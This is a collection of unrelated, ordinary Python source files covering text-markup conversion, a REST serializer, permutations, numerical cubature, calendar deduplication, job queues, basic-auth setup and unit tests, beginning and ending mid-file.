cpNum_controls = glob.glob(PATH + "/" + control_file.split(".")[0] + ".CP[1-9].bam")
str_cpnum_list = []
for cp in cpNum_files:
str_cpnum_list.append(re.search("CP[1-9]", cp).group(0))
for str_cpnum in str_cpnum_list:
output_dir = PATH + '/'+ tool_name +'/' + str_cpnum + '/'
if not os.path.exists(PATH + '/'+ tool_name +'/' + str_cpnum):
os.makedirs(output_dir)
return chromosome_list, cpNum_controls, cpNum_files
|
# -*- coding: utf-8 -*-
"""
Python documentation conversion utils
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2007-2008 by Georg Brandl.
:license: BSD.
"""
import re
from docutils.nodes import make_id
from .docnodes import TextNode, EmptyNode, NodeList
def umlaut(cmd, c):
try:
if cmd == '"':
return {'o': u'ö',
'a': u'ä',
'u': u'ü',
'i': u'ï',
'O': u'Ö',
'A': u'Ä',
'U': u'Ü'}[c]
elif cmd == "'":
return {'a': u'á',
'e': u'é'}[c]
elif cmd == '~':
return {'n': u'ñ'}[c]
elif cmd == 'c':
return {'c': u'ç'}[c]
elif cmd == '`':
return {'o': u'ò'}[c]
else:
from .latexparser import ParserError
raise ParserError('invalid umlaut \\%s' % cmd, 0)
except KeyError:
from .latexparser import ParserError
raise ParserError('unsupported umlaut \\%s%s' % (cmd, c), 0)
def fixup_text(text):
return text.replace('``', '"').replace("''", '"').replace('`', "'").\
replace('|', '\\|').replace('*', '\\*')
def empty(node):
return (type(node) is EmptyNode)
def text(node):
""" Return the text for a TextNode or raise an error. """
if isinstance(node, TextNode):
return node.text
elif isinstance(node, NodeList):
restext = ''
for subnode in node:
restext += text(subnode)
return restext
from .restwriter import WriterError
raise WriterError('text() failed for %r' % node)
markup_re = re.compile(r'(:[a-zA-Z0-9_-]+:)?`(.*?)`')
def my_make_id(name):
""" Like make_id(), but strip roles first. """
return make_id(markup_re.sub(r'\2', name))
alphanum = u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
wordchars_s = alphanum + u'_.-'
wordchars_e = alphanum + u'+`(-'
bad_markup_re = re.compile(r'(:[a-zA-Z0-9_-]+:)?(`{1,2})[ ]*(.+?)[ ]*(\2)')
quoted_code_re = re.compile(r'\\`(``.+?``)\'')
paren_re = re.compile(r':(func|meth|cfunc):`(.*?)\(\)`')
def repair_bad_inline_markup(text):
# remove quoting from `\code{x}'
xtext = quoted_code_re.sub(r'\1', text)
# special: the literal backslash
xtext = xtext.replace('``\\``', '\x03')
# special: literal backquotes
xtext = xtext.replace('``````', '\x02')
# remove () from function markup
xtext = paren_re.sub(r':\1:`\2`', xtext)
ntext = []
lasti = 0
l = len(xtext)
for m in bad_markup_re.finditer(xtext):
ntext.append(xtext[lasti:m.start()])
s, e = m.start(), m.end()
if s != 0 and xtext[s-1:s] in wordchars_s:
ntext.append('\\ ')
ntext.append((m.group(1) or '') + m.group(2) + m.group(3) + m.group(4))
if e != l and xtext[e:e+1] in wordchars_e:
ntext.append('\\ ')
lasti = m.end()
ntext.append(xtext[lasti:])
return ''.join(ntext).replace('\x02', '``````').replace('\x03', '``\\``')
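# A short demonstration sketch of the helpers above, using illustrative inputs:
if __name__ == '__main__':
    print(fixup_text("``quoted'' *text*"))  # -> "quoted" \*text\*
    print(my_make_id(":func:`spam`"))       # -> spam
    # escapes the role markup away from adjacent word characters
    print(repair_bad_inline_markup("x:func:`spam()`y"))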
|
from django.db import IntegrityError
from rest_framework import exceptions
from rest_framework import serializers as ser
from api.base.exceptions import Conflict
from api.base.utils import absolute_reverse, get_user_auth
from api.base.serializers import JSONAPISerializer, LinksField, VersionedDateTimeField, RelationshipField
from osf.models import NodeRequest
from osf.utils.workflows import DefaultStates, RequestTypes
class NodeRequestSerializer(JSONAPISerializer):
class Meta:
type_ = 'node-requests'
filterable_fields = frozenset([
'creator',
'request_type',
'machine_state',
'created',
'id'
])
id = ser.CharField(source='_id', read_only=True)
request_type = ser.ChoiceField(read_only=True, required=False, choices=RequestTypes.choices())
machine_state = ser.ChoiceField(read_only=True, required=False, choices=DefaultStates.choices())
comment = ser.CharField(required=False, allow_blank=True, max_length=65535)
created = VersionedDateTimeField(read_only=True)
modified = VersionedDateTimeField(read_only=True)
date_last_transitioned = VersionedDateTimeField(read_only=True)
target = RelationshipField(
read_only=True,
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<target._id>'},
filter_key='target___id',
)
creator = RelationshipField(
read_only=True,
related_view='users:user-detail',
related_view_kwargs={'user_id': '<creator._id>'},
filter_key='creator___id',
)
links = LinksField({
'self': 'get_absolute_url',
'target': 'get_target_url'
})
def get_absolute_url(self, obj):
return absolute_reverse('requests:node-request-detail', kwargs={'request_id': obj._id, 'version': self.context['request'].parser_context['kwargs']['version']})
def get_target_url(self, obj):
return absolute_reverse('nodes:node-detail', kwargs={'node_id': obj.target._id, 'version': self.context['request'].parser_context['kwargs']['version']})
def create(self, validated_data):
raise NotImplementedError()
class NodeRequestCreateSerializer(NodeRequestSerializer):
request_type = ser.ChoiceField(required=True, choices=RequestTypes.choices())
def create(self, validated_data):
auth = get_user_auth(self.context['request'])
if not auth.user:
raise exceptions.PermissionDenied
try:
node = self.context['view'].get_node()
except exceptions.PermissionDenied:
node = self.context['view'].get_node(check_object_permissions=False)
if auth.user in node.contributors:
raise exceptions.PermissionDenied('You cannot request access to a node you contribute to.')
raise
comment = validated_data.pop('comment', '')
request_type = validated_data.pop('request_type', None)
if not request_type:
raise exceptions.ValidationError('You must specify a valid request_type.')
try:
node_request = NodeRequest.objects.create(
target=node,
creator=auth.user,
comment=comment,
machine_state=DefaultStates.INITIAL.value,
request_type=request_type
)
node_request.save()
except IntegrityError:
raise Conflict('Users may not have more than one {} request per node.'.format(request_type))
node_request.run_submit(auth.user)
return node_request
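# Request payload sketch (hypothetical values; field names follow the serializer
# above). A client creating a node request would POST JSON:API data shaped like:
#     {"data": {"type": "node-requests",
#               "attributes": {"request_type": "access",
#                              "comment": "Please add me as a contributor."}}}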
|
# File: Permutations.py
#
# Description: Creates permutations of an entered word.
#
__author__ = 'lothilius'
import math
class Permutations():
"""This module contains functions to generate all unique permutations
of a string, and to count permutations.
"""
    @staticmethod
    def countOccurrences(word):
# create a list of 26 0s to count occurrences of each
# letter.
word = word.lower()
occurs = [0]*26
for ch in word:
i = ord(ch) - ord('a')
occurs[i] += 1
return occurs
    @staticmethod
    def howManyPerms(word):
"""Return the number of permutations and unique
permutations of a string.
"""
word = word.lower()
n = len(word)
# count the occurrences of each letter in word.
occurs = Permutations.countOccurrences(word)
# For any letter that recurs, the number of unique
# permutations is the totalPerms divided by the
# factorial of that count.
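        # Example: for 'toot' ('t' and 'o' each appear twice), the unique
        # count is 4! / (2! * 2!) = 24 / 4 = 6.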
divisor = 1
for i in range(26):
if occurs[i] > 1:
divisor *= math.factorial(occurs[i])
totalPerms = math.factorial(n)
        uniquePerms = totalPerms // divisor  # integer division keeps the count an int
return (totalPerms, uniquePerms)
# Fixed this so that it doesn't return duplicates.
    @staticmethod
    def allPermsAux(word, permsSeen):
"""This is an auxiliary function that generates all
unique permutations of the input string not already in
the list permsSeen.
"""
        if len(word) <= 1:
yield word
else:
for perm in Permutations.allPermsAux(word[1:], permsSeen):
for i in range(len(perm)+1):
newperm = perm[:i] + word[0] + perm[i:]
                    if newperm not in permsSeen:
permsSeen.append(newperm)
yield newperm
    @staticmethod
    def allPerms(word):
"""This function generates all unique permutations of the
input string.
"""
return Permutations.allPermsAux(word, [])
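# Minimal usage sketch (hypothetical driver, not part of the original file):
if __name__ == '__main__':
    total, unique = Permutations.howManyPerms('aabb')
    print('aabb has %d total and %d unique permutations' % (total, unique))
    print(sorted(Permutations.allPerms('aabb')))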
|
import numpy as np
from sympy import Rational as frac
from sympy import cos, pi, sin, sqrt
from ..helpers import article, untangle
from ._helpers import CnScheme, _s
_source = article(
authors=["A.H. Stroud"],
title="Remarks on the Disposition of Points in Numerical Integration Formulas",
journal="Mathematical Tables and Other Aids to Computation",
volume="11",
number="60",
month="oct",
year="1957",
pages="257-261",
url="https://doi.org/10.2307/2001945",
)
def stroud_1957_2(n):
r = sqrt(3) / 6
data = [
(1.0, np.array([np.full(n, 2 * r)])),
(+r, _s(n, -1, r)),
(-r, _s(n, +1, r)),
]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-2", n, weights, points, 2, _source, 1.511e-14)
def stroud_1957_3(n):
    n2 = n // 2  # floor division; identical for even and odd n
i_range = range(1, 2 * n + 1)
pts = [
[
[sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],
[sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],
]
for k in range(1, n2 + 1)
]
if n % 2 == 1:
sqrt3pm = np.full(2 * n, 1 / sqrt(3))
sqrt3pm[1::2] *= -1
pts.append(sqrt3pm)
pts = np.vstack(pts).T
data = [(frac(1, 2 * n), pts)]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-3", n, weights, points, 3, _source)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import datetime
import dateparser
import feedparser
import requests
import json
import re
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
SCOPES = 'https://www.googleapis.com/auth/calendar'
CLIENT_SECRET_FILE = 'client_secret.json'
CLIENT_CREDENTIALS_FILE = 'client_credentials.json'
APPLICATION_NAME = 'Minsk Geek Eventer'
CALENDAR = 'Minsk Geek Events'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
store = Storage(CLIENT_CREDENTIALS_FILE)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + CLIENT_CREDENTIALS_FILE)
return credentials
def main():
""""""
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('calendar', 'v3', http=http)
calendarId = 'primary'
# Fetch all calendars and get id of CALENDAR
page_token = None
while True:
calendar_list = service.calendarList().list(pageToken=page_token).execute()
for calendar_list_entry in calendar_list['items']:
if CALENDAR == calendar_list_entry["summary"]:
calendarId = calendar_list_entry["id"]
page_token = calendar_list.get('nextPageToken')
if not page_token:
break
    print('Getting the already existing events')
events = []
page_token = None
while True:
eventsResult = service.events().list(
calendarId=calendarId, maxResults=2500, singleEvents=True,
orderBy='startTime', pageToken=page_token).execute()
events.extend(eventsResult.get('items', []))
page_token = eventsResult.get('nextPageToken')
if not page_token:
break
for n, event in enumerate(events):
for latest_event in events[n + 1:]:
if 'dateTime' in event['start'] and 'dateTime' in latest_event['start']:
if (event['summary'] == latest_event['summary'] and
event['start']['dateTime'] == latest_event['start']['dateTime'] ):
print("Deleting %s %s event" % (event['start']['dateTime'], event['summary']))
try:
                        service.events().delete(calendarId=calendarId, eventId=event['id']).execute()
                        break  # this duplicate is deleted; stop comparing it with later events
except Exception as e:
print(e)
continue
elif 'date' in event['start'] and 'date' in latest_event['start']:
if (event['summary'] == latest_event['summary'] and
event['start']['date'] == latest_event['start']['date'] ):
print("Deleting %s %s event" % (event['start']['date'], event['summary']))
try:
                        service.events().delete(calendarId=calendarId, eventId=event['id']).execute()
                        break  # this duplicate is deleted; stop comparing it with later events
except Exception as e:
print(e)
continue
if __name__ == '__main__':
main()
|
import logging
import six
from oioioi.base.utils.db import require_transaction
from oioioi.contests.models import Submission
from oioioi.evalmgr.models import QueuedJob
logger = logging.getLogger(__name__)
@require_transaction
def mark_job_state(environ, state, **kwargs):
"""Sets status of given environ in job queue. Additional arguments are
used to update QueuedJob object. Returns True when the status was
set, and the job should be continued, False when it ought to be
ignored.
"""
if 'submission_id' in environ:
submission = Submission.objects.filter(id=environ['submission_id'])
if submission.exists():
kwargs['submission'] = submission.get()
kwargs['state'] = state
qj, created = QueuedJob.objects.get_or_create(
job_id=environ['job_id'], defaults=kwargs
)
if not created:
if qj.state == 'CANCELLED':
qj.delete()
logger.info('Job %s cancelled.', str(environ['job_id']))
return False
else:
for k, v in six.iteritems(kwargs):
setattr(qj, k, v)
qj.save()
return True
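# Call-site sketch (hypothetical state name): an evaluation manager would
# typically mark the job before each phase and drop it once cancelled:
#     if not mark_job_state(environ, 'QUEUED'):
#         return  # the job was cancelled; ignore it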
|
"""
Basic Auth support.
Usage:
@graph.app.route("/path")
@graph.basic_auth.required
def must_be_authorized():
pass
"""
from base64 import b64encode
from flask_basicauth import BasicAuth
from microcosm.api import defaults
from werkzeug.exceptions import Unauthorized
from microcosm_flask.conventions.encoding import with_headers
def encode_basic_auth(username, password):
"""
Encode basic auth credentials.
"""
return "Basic {}".format(
b64encode(
"{}:{}".format(
username,
password,
).encode("utf-8")
).decode("utf-8")
)
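# For example (hypothetical credentials):
#     encode_basic_auth("user", "secret")  # -> 'Basic dXNlcjpzZWNyZXQ='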
class ConfigBasicAuth(BasicAuth):
"""
Basic auth decorator that pulls credentials from static configuration.
This decorator is sufficient for internal service access control, but should
not be used for anything truly sensitive.
"""
def __init__(self, app, credentials):
super(ConfigBasicAuth, self).__init__(app)
self.credentials = credentials
def check_credentials(self, username, password):
"""
Override credential checking to use configured credentials.
"""
return password is not None and self.credentials.get(username, None) == password
def challenge(self):
"""
Override challenge to raise an exception that will trigger regular error handling.
"""
response = super(ConfigBasicAuth, self).challenge()
raise with_headers(Unauthorized(), response.headers)
@defaults(
credentials=dict(
# set a default configuration but don't merge it if other config is set
__merge__=False,
default="secret",
),
)
def configure_basic_auth_decorator(graph):
"""
Configure a basic auth decorator.
"""
# use the metadata name if no realm is defined
graph.config.setdefault("BASIC_AUTH_REALM", graph.metadata.name)
return ConfigBasicAuth(
app=graph.flask,
# wrap in dict to allow lists of items as well as dictionaries
credentials=dict(graph.config.basic_auth.credentials),
)
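# Wiring sketch (hypothetical override): the defaults above yield a single
# "default"/"secret" credential pair; a deployment would typically replace
# graph.config.basic_auth.credentials with its own mapping before building
# the graph, after which @graph.basic_auth.required guards routes.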
|
# napper -- A REST Client for Python
# Copyright (C) 2016 by Yann Kaiser and contributors.
# See AUTHORS and COPYING for details.
import io
import json
import re
from .. import restspec
from ..errors import UnknownParameters
from .util import Tests
class ConfigTests(Tests):
def make_spec(self, **obj):
obj.setdefault('base_address', 'http://www.example.org')
return restspec.RestSpec.from_file(io.StringIO(json.dumps(obj)))
def test_unknown_params(self):
with self.assertWarns(UnknownParameters):
self.make_spec(
base_address="http://some.address", invalidoption=0)
def test_address(self):
spec = self.make_spec(base_address="http://an.address.com")
self.assertEqual(spec.address, "http://an.address.com")
def test_address_trailing(self):
spec = self.make_spec(base_address="http://an.address.com/")
self.assertEqual(spec.address, "http://an.address.com")
def test_permalink_attr_suffix(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"}, {"matches": {"suffix": "_url"}}])
self.assertTrue(
spec.is_permalink_attr("https://...", {"attribute": "abcd_url"}))
self.assertFalse(
spec.is_permalink_attr("https://...", {"attribute": "abcd"}))
def test_permalink_attr_prefix(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"}, {"matches": {"prefix": "link_"}}])
self.assertTrue(
spec.is_permalink_attr("https://...", {"attribute": "link_abcd"}))
self.assertFalse(
spec.is_permalink_attr("https://...", {"attribute": "abcd"}))
def test_permalink_attr_prefix_suffix(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"}, {"matches": {"prefix": "link_",
"suffix": "_url"}}])
self.assertTrue(spec.is_permalink_attr(
"https://...", {"attribute": "link_abcd_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "link_abcd"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "abcd_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "abcd"}))
def test_permalink_attr_pattern(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"},
{"matches": {"pattern": "^link_[0-9]+_url$"}}])
self.assertTrue(spec.is_permalink_attr(
"https://...", {"attribute": "link_4_url"}))
self.assertTrue(spec.is_permalink_attr(
"https://...", {"attribute": "link_123456_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "link_abcd_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "1234567"}))
class FetcherTests(Tests):
def f(self, obj):
obj = json.loads(json.dumps(obj), object_hook=restspec.WarnOnUnusedKeys)
return restspec.Fetcher.from_restspec(obj)
def nv(self):
return self.assertRaises(restspec.NoValue)
def test_none(self):
f = self.f(None)
with self.nv():
f({})
with self.nv():
f("abc")
with self.nv():
f({"spam": "ham"})
r = {"spam": "ham"}
with self.nv():
f("ham", {"parent": r, "key": "spam", "root": r})
def test_missing_action(self):
with self.assertRaises(ValueError):
self.f({})
def test_multiple_actions(self):
with self.assertRaises(ValueError):
self.f({'attr': 'abc', 'value': 42})
def test_implicit_value(self):
self.assertEqual(None, self.f([None])({}))
self.assertEqual(0, self.f(0)({}))
self.assertEqual(42, self.f(42)({}))
self.assertEqual('ham', self.f('ham')({}))
self.assertEqual(['item1', 'item2'], self.f([['item1', 'item2']])({}))
def test_value(self):
self.assertEqual(None, self.f({'value': None})({}))
self.assertEqual(0, self.f({'value': 0})({}))
self.assertEqual('ham', self.f({'value': 'ham'})({}))
self.assertEqual({'a': 0}, self.f({'value': {'a': 0}})({}))
self.assertEqual('always', self.f('always')({}))
self.assertEqual('never', self.f('never')({}))
def test_attribute(self):
f = self.f({'attr': 'spam'})
self.assertEqual('ham', f({'spam': 'ham', 'eggs': '42'}))
with self.nv():
f({'eggs': '42'})
with self.nv():
f('str doesnt have attrs')
def test_attribute_indirection(self):
f = self.f({'attr': {'attr': 'eggs'}})
self.assertEqual('spam', f({'eggs': 'ham', 'ham': 'spam'}))
with self.nv():
f({'ham': 'spam'})
with self.nv():
f({'eggs': 'ham'})
def test_deep_attribute(self):
f = self.f([{'attr': 'spam'}, {'attr': 'ham'}])
self.assertEqual('eggs', f({'spam': {'ham': 'eggs'}}))
with self.nv():
f('str doesnt have attrs')
def test_item(self):
fixt = ['spam', 'ham', 'eggs']
self.assertEqual('spam', self.f({'item': 0})(fixt))
self.assertEqual('ham', self.f({'item': 1})(fixt))
self.assertEqual('eggs', self.f({'item': 2})(fixt))
self.assertEqual('spam', self.f({'item': -3})(fixt))
self.assertEqual('ham', self.f({'item': -2})(fixt))
self.assertEqual('eggs', self.f({'item': -1})(fixt))
with self.nv():
self.f({'item': 3})(fixt)
with self.nv():
self.f({'item': -4})(fixt)
def test_format(self):
f = self.f({'format': ['John']})
self.assertEqual('Hello John!', f('Hello {}!'))
self.assertEqual('Goodbye John!', f('Goodbye {}!'))
def test_root(self):
f = self.f([{'attr': 'ham'}, {'context': 'root'}, {'attr': 'spam'}])
self.assertEqual('sausages', f({'ham': 'eggs', 'spam': 'sausages'}))
f = self.f(['Hello {}!', {'format': [[{'context': 'root'}, {'attr': 'name'}]]}])
self.assertEqual('Hello John!', f({'name': 'John'}))
def test_ifelse(self):
f = self.f({'if': {'is_eq': 23}, 'then': 'abc', 'else': 'def'})
self.assertEqual(f(23), 'abc')
self.assertEqual(f(24), 'def')
class ConditionalTests(Tests):
def c(self, obj):
obj = json.loads(json.dumps(obj), object_hook=restspec.WarnOnUnusedKeys)
return restspec.Conditional.from_restspec(obj)
def test_missing(self):
with self.assertRaises(ValueError):
self.c({})
def test_always_false(self):
c = self.c("never")
self.assertFalse(c({}))
self.assertFalse(c("abc"))
self.assertFalse(c({"spam": "ham"}))
r = {"spam": "ham"}
self.assertFalse(c("ham", {"parent": r, "key": "spam", "root": r}))
def test_none(self):
c = self.c(None)
self.assertFalse(c({}))
self.assertFalse(c("abc"))
self.assertFalse(c({"spam": "ham"}))
r = {"spam": "ham"}
self.assertFalse(c("ham", {"parent": r, "key": "spam", "root": r}))
def test_always_true(self):
c = self.c("always")
self.assertTrue(c({}))
self.assertTrue(c("abc"))
self.assertTrue(c({"spam": "ham"}))
r = {"spam": "ham"}
self.assertTrue(c("ham", {"parent": r, "key": "spam", "root": r}))
def test_attr_exists(self):
c = self.c({'attr_exists': 'attr'})
self.assertTrue(c({'attr': 'ham'}))
r = {'spam': 'ham'}
self.assertFalse(c(r, context={"root": r}))
r2 = {"attr": r}
self.assertFalse(
c(r, {"attribute": "attr", "parent": r2, "root": r2}))
def test_eq_value(self):
c = self.c({'is_eq': 42})
self.assertTrue(c(42))
self.assertFalse(c(43))
c = self.c({'eq': [{"context": "value"}, 42]})
self.assertTrue(c(42))
self.assertFalse(c(43))
def test_eq(self):
c = self.c({'eq': [42, {"attr": "spam"}]})
self.assertTrue(c({"spam": 42}))
self.assertFalse(c({"spam": 43}))
def test_attr_name_is(self):
c = self.c({'eq': ["permalink", [{"context": "attribute"}]]})
r = {"permalink": "abc", "spam": "def"}
self.assertTrue(
c(r["permalink"], {"attribute": "permalink", "parent": r}))
self.assertFalse(
c(r["spam"], {"attribute": "spam", "parent": r}))
def test_not(self):
c = self.c({'not': {'is_eq': "apples"}})
self.assertFalse(c("apples"))
self.assertTrue(c("oranges"))
def test_any(self):
c = self.c({'any': [{'is_eq': 'pear'}, {'is_eq': 'apple'}]})
self.assertTrue(c("pear"))
self.assertTrue(c("apple"))
self.assertFalse(c("orange"))
def test_any_recover(self):
c = self.c({'any': [{'eq': ['ham', {'context': 'attribute'}]},
{'is_eq': 42}]})
self.assertTrue(c(42))
self.assertFalse(c(43))
def test_all(self):
c = self.c({'all': [
{'is_eq': 'spam'},
{'eq': ['ham', {'context': 'attribute'}]}
]})
self.assertTrue(c("spam", context={'attribute': 'ham'}))
self.assertFalse(c("spam", context={'attribute': 'eggs'}))
self.assertFalse(c("spam", context={}))
self.assertFalse(c("orange", context={'attribute': 'ham'}))
def test_not_conditional(self):
with self.assertRaises(ValueError):
self.c(42)
with self.assertRaises(ValueError):
self.c({"value": ['abc']})
def test_raw_value(self):
c = self.c(True)
self.assertTrue(c({}))
c = self.c(False)
self.assertFalse(c({}))
def test_implicit_and(self):
c = self.c({'attr_exists': 'abc', 'eq': [{'attr': 'spam'}, 'ham']})
self.assertTrue(c({'abc': 0, 'spam': 'ham'}))
self.assertFalse(c({'abc': 0, 'spam': 'eggs'}))
self.assertFalse(c({'abc': 0}))
self.assertFalse(c({'spam': 'ham'}))
def test_mixed(self):
with self.assertRaises(ValueError):
self.c({'attr_exists': 'abc', 'value': 'True'})
def test_match(self):
c = self.c({'matches': {'prefix': 'link_', 'suffix': '_url'}})
self.assertTrue(c('link_stuff_url'))
self.assertFalse(c('link_stuff'))
self.assertFalse(c('stuff_url'))
self.assertFalse(c('link_url'))
c = self.c({'matches': {'pattern': 'link_.*_url'}})
self.assertTrue(c('link_stuff_url'))
self.assertFalse(c('link_stuff'))
self.assertFalse(c('stuff_url'))
self.assertFalse(c('link_url'))
def test_hint(self):
c = self.c([{'context': 'attribute'}, {'matches': {'suffix': '_url'}}])
self.assertEqual(c.attr_name_hint('abc'), 'abc_url')
self.assertEqual(c.attr_name_hint('xyz'), 'xyz_url')
def test_nohint(self):
cs = [
self.c(True),
self.c([{'attr': 'abc'}, {'attr': 'def'}, {'is_eq': 'ghi'}]),
self.c([{'attr': 'abc'}, {'is_eq': 123}]),
self.c([{'context': [{'attr': 'abc'}, {'attr': 'def'}]},
{'is_eq': 'ghi'}]),
self.c([{'context': {'attr': 'abc'}}, {'is_eq': 123}]),
self.c([{'context': 'value'}, {'is_eq': 123}]),
self.c([{'context': 'attribute'}, {'is_eq': 123}]),
]
for c in cs:
with self.assertRaises(restspec.NoValue):
c.attr_name_hint("test")
class MatcherTests(Tests):
def m(self, spec):
return restspec.Matcher.from_restspec(self.to_config_dict(spec))
def test_false(self):
m = self.m(None)
self.assertFalse(m('abcdef'))
self.assertFalse(m(''))
self.assertEqual(m.pattern, None)
def test_true(self):
m = self.m("any")
self.assertTrue(m('abcdef'))
self.assertTrue(m(''))
self.assertEqual(m.pattern, re.compile(''))
def test_pattern(self):
m = self.m({'pattern': 'abc.*def'})
self.assertTrue(m('abcdef'))
self.assertTrue(m('abcxyzdef'))
self.assertTrue(m('abc123def'))
self.assertFalse(m('abc'))
self.assertFalse(m('abcxyz'))
self.assertFalse(m('xyzdef'))
self.assertFalse(m('def'))
self.assertFalse(m('xyz'))
self.assertFalse(m(''))
self.assertEqual(m.pattern, re.compile('abc.*def'))
def test_prefix(self):
m = self.m({'prefix': 'abc'})
self.assertTrue(m('abc'))
self.assertTrue(m('abcdef'))
self.assertTrue(m('abc123'))
self.assertFalse(m(''))
self.assertFalse(m('def'))
self.assertFalse(m('123'))
self.assertFalse(m('defabc'))
self.assertEqual(m.pattern, re.compile('^abc.*$'))
def test_suffix(self):
m = self.m({'suffix': 'xyz'})
self.assertTrue(m('xyz'))
self.assertTrue(m('abcdefxyz'))
self.assertTrue(m('123xyz'))
self.assertFalse(m('xyzabc'))
self.assertFalse(m(''))
self.assertFalse(m('abc'))
self.assertFalse(m('123'))
self.assertEqual(m.pattern, re.compile('^.*xyz$'))
def test_prefix_suffix(self):
m = self.m({'prefix': 'abc', 'suffix': 'xyz'})
self.assertTrue(m('abcxyz'))
self.assertTrue(m('abcdefxyz'))
self.assertTrue(m('abc123xyz'))
self.assertFalse(m('xyzabc'))
self.assertFalse(m(''))
self.assertFalse(m('abc'))
self.assertFalse(m('123'))
self.assertFalse(m('xyz'))
self.assertFalse(m('abcxyz123'))
self.assertFalse(m('123abcxyz'))
self.assertEqual(m.pattern, re.compile('^abc.*xyz$'))
def test_prefix_suffix_escape(self):
m = self.m({'prefix': '$', 'suffix': '$'})
self.assertTrue(m('$abcdef$'))
self.assertTrue(m('$$'))
self.assertTrue(m('$123$'))
self.assertFalse(m('abc$'))
self.assertFalse(m('$abc'))
self.assertFalse(m('$'))
self.assertEqual(m.pattern, re.compile(r'^\$.*\$$'))
def test_nospec(self):
with self.assertRaises(ValueError):
self.m({})
def test_pat_nohint(self):
m = self.m({'pattern': 'abc.*'})
with self.assertRaises(restspec.NoValue):
m.hint('test')
def test_pat_expl_hint(self):
m = self.m({'pattern': 'abc.*', 'hint': 'abc{}def'})
self.assertEqual(m.hint('test'), 'abctestdef')
self.assertEqual(m.hint('abc'), 'abcabcdef')
self.assertEqual(m.hint(''), 'abcdef')
def test_prefix_hint(self):
m = self.m({'prefix': 'abc'})
self.assertEqual(m.hint('test'), 'abctest')
self.assertEqual(m.hint(''), 'abc')
self.assertEqual(m.hint('abc'), 'abcabc')
def test_suffix_hint(self):
m = self.m({'suffix': 'abc'})
self.assertEqual(m.hint('test'), 'testabc')
self.assertEqual(m.hint(''), 'abc')
self.assertEqual(m.hint('abc'), 'abcabc')
def test_prefix_suffix_hint(self):
m = self.m({'prefix': 'abc', 'suffix': 'xyz'})
self.assertEqual(m.hint('test'), 'abctestxyz')
self.assertEqual(m.hint(''), 'abcxyz')
self.assertEqual(m.hint('abc'), 'abcabcxyz')
def test_prefix_expl_hint(self):
m = self.m({'prefix': 'abc', 'hint': 'abc{}123'})
self.assertEqual(m.hint("xyz"), "abcxyz123")
def test_suffix_expl_hint(self):
m = self.m({'suffix': 'abc', 'hint': '123{}abc'})
self.assertEqual(m.hint("xyz"), "123xyzabc")
def test_prefix_suffix_expl_hint(self):
m = self.m({'prefix': 'abc', 'suffix': 'xyz', 'hint': 'abcxyz{}abcxyz'})
self.assertEqual(m.hint("123"), "abcxyz123abcxyz")
|
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from io import BytesIO
from test_framework.messages import CTransaction, ToHex
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
hex_str_to_bytes,
)
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
    >>> json.dumps(multidict([(1,2),(1,2)]))
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
["-txindex"],
["-txindex"],
["-txindex"],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info('prepare some coins for multiple *rawtransaction commands')
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
self.log.info('Test getrawtransaction on genesis block coinbase returns an error')
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
